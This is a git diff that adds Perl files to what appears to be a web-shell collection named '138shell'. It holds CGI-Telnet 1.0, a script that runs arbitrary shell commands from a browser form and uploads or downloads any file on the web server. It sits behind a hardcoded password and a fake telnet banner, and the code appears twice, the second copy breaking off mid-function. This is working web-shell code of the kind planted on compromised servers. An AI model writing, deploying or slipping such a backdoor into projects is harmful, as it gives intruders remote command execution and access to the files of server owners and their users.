+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+        $EncodedCurrentDir = $CurrentDir;
+        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+        print "Content-type: text/html\n\n";
+        print <<END;
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
+$ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+        $Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab
+Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
+color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
+color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
+color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font
+color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          /
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+        print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+        print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+        print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+        @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+        foreach $cookie(@httpcookies)
+        {
+                ($id, $val) = split(/=/, $cookie);
+                $Cookies{$id} = $val;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+        print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+        print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+        &PrintPageHeader("p");
+        &PrintLogoutScreen;
+        &PrintLoginScreen;
+        &PrintLoginForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin
+{
+        if($LoginPassword eq $Password) # password matched
+        {
+                print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+                &PrintPageHeader("c");
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # password didn't match
+        {
+                &PrintPageHeader("p");
+                &PrintLoginScreen;
+                if($LoginPassword ne "") # some password was entered
+                {
+                        &PrintLoginFailedMessage;
+                }
+                &PrintLoginForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+        print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+        if(!$WinNT)
+        {
+                alarm(0);
+                print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+                exit;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+        if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+        {
+                # we change the directory internally. The output of the
+                # command is not displayed.
+
+                $OldDir = $CurrentDir;
+                $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+                chop($CurrentDir = `$Command`);
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+                print "<code>$Prompt $RunCommand</code>";
+        }
+        else # some other command, display the output
+        {
+                &PrintPageHeader("c");
+                $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+                print "<code>$Prompt $RunCommand</code><xmp>";
+                $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+                if(!$WinNT)
+                {
+                        $SIG{'ALRM'} = \&CommandTimeout;
+                        alarm($CommandTimeoutDuration);
+                }
+                if($ShowDynamicOutput) # show output as it is generated
+                {
+                        $|=1;
+                        $Command .= " |";
+                        open(CommandOutput, $Command);
+                        while(<CommandOutput>)
+                        {
+                                $_ =~ s/(\n|\r\n)$//;
+                                print "$_\n";
+                        }
+                        $|=0;
+                }
+                else # show output after command completes
+                {
+                        print `$Command`;
+                }
+                if(!$WinNT)
+                {
+                        alarm(0);
+                }
+                print "</xmp>";
+        }
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+        local($FileUrl) = @_;
+        if(-e $FileUrl) # if the file exists
+        {
+                # encode the file link so we can send it to the browser
+                $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+                $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+                $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+                &PrintPageHeader("c");
+                print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+                &PrintCommandLineInputForm;
+                &PrintPageFooter;
+        }
+        else # file doesn't exist
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $FileUrl: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+        local($SendFile) = @_;
+        if(open(SENDFILE, $SendFile)) # file opened for reading
+        {
+                if($WinNT)
+                {
+                        binmode(SENDFILE);
+                        binmode(STDOUT);
+                }
+                $FileSize = (stat($SendFile))[7];
+                ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+                print "Content-Type: application/x-unknown\n";
+                print "Content-Length: $FileSize\n";
+                print "Content-Disposition: attachment; filename=$1\n\n";
+                print while(<SENDFILE>);
+                close(SENDFILE);
+        }
+        else # failed to open file
+        {
+                &PrintPageHeader("f");
+                print "<code>Failed to download $SendFile: $!</code>";
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+        }
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+        # if no file is specified, print the upload form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileUploadForm;
+                &PrintPageFooter;
+                return;
+        }
+        &PrintPageHeader("c");
+
+        # start the uploading process
+        print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+        # get the fullly qualified pathname of the file to be created
+        chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+        $TransferFile =~ m!([^/^\\]*)$!;
+        $TargetName .= $PathSep.$1;
+
+        $TargetFileSize = length($in{'filedata'});
+        # if the file exists and we are not supposed to overwrite it
+        if(-e $TargetName && $Options ne "overwrite")
+        {
+                print "Failed: Destination file already exists.<br>";
+        }
+        else # file is not present
+        {
+                if(open(UPLOADFILE, ">$TargetName"))
+                {
+                        binmode(UPLOADFILE) if $WinNT;
+                        print UPLOADFILE $in{'filedata'};
+                        close(UPLOADFILE);
+                        print "Transfered $TargetFileSize Bytes.<br>";
+                        print "File Path: $TargetName<br>";
+                }
+                else
+                {
+                        print "Failed: $!<br>";
+                }
+        }
+        print "</code>";
+        &PrintCommandLineInputForm;
+        &PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+        # if no file is specified, print the download form again
+        if($TransferFile eq "")
+        {
+                &PrintPageHeader("f");
+                &PrintFileDownloadForm;
+                &PrintPageFooter;
+                return;
+        }
+
+        # get fully qualified path of the file to be downloaded
+        if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+                (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+        {
+                $TargetFile = $TransferFile;
+        }
+        else # path is relative
+        {
+                chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+                $TargetFile .= $PathSep.$TransferFile;
+        }
+
+        if($Options eq "go") # we have to send the file
+        {
+                &SendFileToBrowser($TargetFile);
+        }
+        else # we have to send only the link page
+        {
+                &PrintDownloadLinkPage($TargetFile);
+        }
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+        &PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+        &ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+        &UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+        &DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+        &PerformLogout;
+}
diff --git a/138shell/T/telnet.pl.txt b/138shell/T/telnet.pl.txt
new file mode 100644
index 0000000..774fcdc
--- /dev/null
+++ b/138shell/T/telnet.pl.txt
@@ -0,0 +1,692 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "1236987navaro";		# Change this. You will need to enter this
+				# to login.
+
+$WinNT = 0;			# You need to change the value of this to 1 if
+				# you're running this script on a Windows NT
+				# machine. If you're running it on Unix, you
+				# can leave the value as it is.
+
+$NTCmdSep = "&";		# This character is used to seperate 2 commands
+				# in a command line on Windows NT.
+
+$UnixCmdSep = ";";		# This character is used to seperate 2 commands
+				# in a command line on Unix.
+
+$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
+				# Don't set this to a very large value. This is
+				# useful for commands that may hang or that
+				# take very long to execute, like "find /".
+				# This is valid only on Unix servers. It is
+				# ignored on NT Servers.
+
+$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
+				# browser as soon as it is output, otherwise
+				# it is buffered and send when the command
+				# completes. This is useful for commands like
+				# ping, so that you can see the output as it
+				# is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse 
+{
+	local (*in) = @_ if @_;
+	local ($i, $loc, $key, $val);
+	
+	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+	if($ENV{'REQUEST_METHOD'} eq "GET")
+	{
+		$in = $ENV{'QUERY_STRING'};
+	}
+	elsif($ENV{'REQUEST_METHOD'} eq "POST")
+	{
+		binmode(STDIN) if $MultipartFormData & $WinNT;
+		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+	}
+
+	# handle file upload data
+	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+	{
+		$Boundary = '--'.$1; # please refer to RFC1867 
+		@list = split(/$Boundary/, $in); 
+		$HeaderBody = $list[1];
+		$HeaderBody =~ /\r\n\r\n|\n\n/;
+		$Header = $`;
+		$Body = $';
+ 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+		$in{'filedata'} = $Body;
+		$Header =~ /filename=\"(.+)\"/; 
+		$in{'f'} = $1; 
+		$in{'f'} =~ s/\"//g;
+		$in{'f'} =~ s/\s//g;
+
+		# parse trailer
+		for($i=2; $list[$i]; $i++)
+		{ 
+			$list[$i] =~ s/^.+name=$//;
+			$list[$i] =~ /\"(\w+)\"/;
+			$key = $1;
+			$val = $';
+			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} = $val; 
+		}
+	}
+	else # standard post data (url encoded, not multipart)
+	{
+		@in = split(/&/, $in);
+		foreach $i (0 .. $#in)
+		{
+			$in[$i] =~ s/\+/ /g;
+			($key, $val) = split(/=/, $in[$i], 2);
+			$key =~ s/%(..)/pack("c", hex($1))/ge;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} .= "\0" if (defined($in{$key}));
+			$in{$key} .= $val;
+		}
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+	$EncodedCurrentDir = $CurrentDir;
+	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+	print "Content-type: text/html\n\n";
+	print <<END;
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+                                         
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          / 
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+	print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+	print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+	print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+	foreach $cookie(@httpcookies)
+	{
+		($id, $val) = split(/=/, $cookie);
+		$Cookies{$id} = $val;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+	print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+	&PrintPageHeader("p");
+	&PrintLogoutScreen;
+	&PrintLoginScreen;
+	&PrintLoginForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin 
+{
+	if($LoginPassword eq $Password) # password matched
+	{
+		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+		&PrintPageHeader("c");
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # password didn't match
+	{
+		&PrintPageHeader("p");
+		&PrintLoginScreen;
+		if($LoginPassword ne "") # some password was entered
+		{
+			&PrintLoginFailedMessage;
+		}
+		&PrintLoginForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+	if(!$WinNT)
+	{
+		alarm(0);
+		print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+		exit;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+	{
+		# we change the directory internally. The output of the
+		# command is not displayed.
+		
+		$OldDir = $CurrentDir;
+		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+		chop($CurrentDir = `$Command`);
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+		print "<code>$Prompt $RunCommand</code>";
+	}
+	else # some other command, display the output
+	{
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+		print "<code>$Prompt $RunCommand</code><xmp>";
+		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+		if(!$WinNT)
+		{
+			$SIG{'ALRM'} = \&CommandTimeout;
+			alarm($CommandTimeoutDuration);
+		}
+		if($ShowDynamicOutput) # show output as it is generated
+		{
+			$|=1;
+			$Command .= " |";
+			open(CommandOutput, $Command);
